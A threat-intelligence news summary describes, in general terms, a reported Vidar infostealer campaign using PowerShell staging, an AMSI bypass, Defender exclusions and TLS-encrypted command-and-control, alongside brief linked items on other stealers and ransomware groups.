Vidar infostealer infection chain analysis adds PowerShell evasion, AMSI bypass, and TLS C2 details
Technical Analysis
Summary
Hide ▲
Show ▼
Researchers identified Vidar as using a newer infection chain that mixes PowerShell staging, LOLBins, and AMSI bypass to evade detection, raising the bar for defenders on Windows environments. The malware also adds scheduled task persistence and TLS-encrypted C2, which makes both execution and exfiltration harder to spot. The findings matter because Vidar continues to evolve its stealth and reliability while affiliates steal credentials, cookies, tokens, and financial data. The analysis provides concrete behaviors defenders can monitor, including randomized paths, jittered reconnects, and Windows Defender exception abuse.
Related Happenings
Vidar infostealer market rise and distribution expansion
Malware Activity
First: 28.04.2026 22:07
Last: 28.04.2026 22:07
Sources 1
How related:
That is according to researchers at cybersecurity vendor Aryaka, which published research last week dedicated to a fresh campaign involving the malware-as-a-service Vidar that has emerged in recent weeks.
About this happening:
**Vidar** remains a long-running **infostealer** threat, and **Aryaka** reported a fresh campaign in **recent weeks** that adds **new obfuscation techniques** and stronger **steal...
Vidar infostealer market rise and distribution expansion
Malware ActivityHow related: That is according to researchers at cybersecurity vendor Aryaka, which published research last week dedicated to a fresh campaign involving the malware-as-a-service Vidar that has emerged in recent weeks.
About this happening: **Vidar** remains a long-running **infostealer** threat, and **Aryaka** reported a fresh campaign in **recent weeks** that adds **new obfuscation techniques** and stronger **steal...
Lumma Stealer infection of a Context.ai employee
Malware Activity
First: 23.04.2026 11:40
Last: 23.04.2026 11:40
Sources 1
About this happening:
A **Context.ai** employee was infected with **Lumma Stealer** in **February 2026**, giving attackers a likely foothold that may have seeded the wider compromise chain affecting **...
Lumma Stealer infection of a Context.ai employee
Malware ActivityAbout this happening: A **Context.ai** employee was infected with **Lumma Stealer** in **February 2026**, giving attackers a likely foothold that may have seeded the wider compromise chain affecting **...
The Gentlemen affiliate-driven RaaS expansion and enterprise scale-up
Threat Actor Meta
First: 21.04.2026 17:00
Last: 21.04.2026 17:00
Sources 1
About this happening:
**The Gentlemen ransomware gang** is using a **legitimate vulnerable driver** to defeat enterprise defenses, weaponizing **ThrottleStop.sys** as **ThrottleBlood.sys** to kill **AV...
The Gentlemen affiliate-driven RaaS expansion and enterprise scale-up
Threat Actor MetaAbout this happening: **The Gentlemen ransomware gang** is using a **legitimate vulnerable driver** to defeat enterprise defenses, weaponizing **ThrottleStop.sys** as **ThrottleBlood.sys** to kill **AV...
Venom Stealer MaaS continuous credential theft and exfiltration
Malware Activity
First: 01.04.2026 16:30
Last: 01.04.2026 16:30
Sources 1
About this happening:
The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...
Venom Stealer MaaS continuous credential theft and exfiltration
Malware ActivityAbout this happening: The **Venom Stealer** **malware-as-a-service** platform has been identified as a **credential-theft** threat that keeps exfiltrating data after infection, extending the window for...
TeamPCP and Vect partner to turn supply-chain compromises into ransomware follow-on campaigns
Threat Actor Meta
First: 31.03.2026 15:15
Last: 31.03.2026 15:15
Sources 1
About this happening:
TeamPCP and **Vect ransomware group** are linking **supply-chain compromises** to **follow-on ransomware campaigns**, broadening extortion risk for affected organizations. The shi...
TeamPCP and Vect partner to turn supply-chain compromises into ransomware follow-on campaigns
Threat Actor MetaAbout this happening: TeamPCP and **Vect ransomware group** are linking **supply-chain compromises** to **follow-on ransomware campaigns**, broadening extortion risk for affected organizations. The shi...
Timeline
-
11.09.2025 19:23 2 articles · 8mo ago
Aryaka details Vidar evasion and persistence techniques
Technical Analysis UpdateAryaka Threat Research Lab described a new Vidar infostealer campaign affecting Windows machines, saying the malware uses a PowerShell staging chain with a custom Download-Reliable() function, encrypted command-and-control channels, Living-off-the-Land Binaries (LOLBins), Windows Defender exception abuse, AMSI bypass attempts, a hidden scheduled task for user logon, and TLS-encrypted exfiltration while stealing credentials, cookies, tokens, and financial data.
Show sources
- Vidar Infostealer Back With a Vengeance — www.darkreading.com — 11.09.2025 19:23
- Vidar Infostealer Back With a Vengeance — www.darkreading.com — 11.09.2025 19:23